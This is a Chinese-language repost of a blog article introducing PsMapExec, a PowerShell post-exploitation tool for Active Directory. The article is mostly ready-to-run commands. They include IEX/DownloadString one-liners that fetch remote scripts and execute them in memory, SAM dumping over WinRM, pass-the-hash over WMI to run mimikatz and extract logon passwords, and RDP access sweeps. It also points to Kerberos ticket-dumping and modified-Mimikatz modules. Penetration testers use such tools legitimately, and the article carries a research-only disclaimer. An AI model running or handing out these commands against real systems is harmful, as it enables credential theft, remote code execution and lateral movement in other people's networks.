什么是PsMapExec
PsMapExec是深受CrackMapExec启发而用Powershell编写的一个后渗透利用工具,可用于评估和测试Active Directory环境。
当前支持的方法(协议)
PsExec
RDP
SMB Signing
WinRM
WMI
计划方法
MSSQL (测试中)
IPMI
SNMP
FTP
SSH
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
将脚本直接加载到内存中
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
PsMapExec -Targets All -GenRelayList
PsMapExec -Targets Servers -Username Admin -Password Pass -Method WMI -Command "net user"
通过WinRM转储SAM并解析结果
PsMapExec -Targets Servers -Username Admin -Password Pass -Method WinRM -Module SAM -Option Parse
使用哈希通过WMI进行身份验证并执行mimikatz
PsMapExec -Targets Workstations -Username Admin -Hash [Hash] -Method WMI -Module LogonPasswords -Option Parse -ShowOutput
检查所有系统上的RDP访问
PsMapExec -Targets All -Username Admin -Password Pass -Method RDP
Kirby(基于PowerShell的Kerberos票证转储)
Invoke-Pandemonium(稍作修改的Mimikatz)
https://github.com/The-Viper-One/PME-Scripts
PsMapExec当前不为这些托管HTTP服务器,因此您需要使用HFS之类的东西:https://www.rejetto.com/hfs/?f=dl,支持指向本地或替代托管服务器来获取脚本依赖项。
PsMapExec -Targets All -Username [User] -Password [Pass] -LocalFileServer [IP]
https://viperone.gitbook.io/pentest-everything/psmapexec
https://viperone.gitbook.io/pentest-everything/psmapexec/using-credentials
https://viperone.gitbook.io/pentest-everything/psmapexec/methods
https://viperone.gitbook.io/pentest-everything/psmapexec/modules
https://viperone.gitbook.io/pentest-everything/psmapexec/spray
https://github.com/The-Viper-One/PsMapExec
原文始发于微信公众号(Hack分享吧):神器!Powershell版CrackMapExec
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论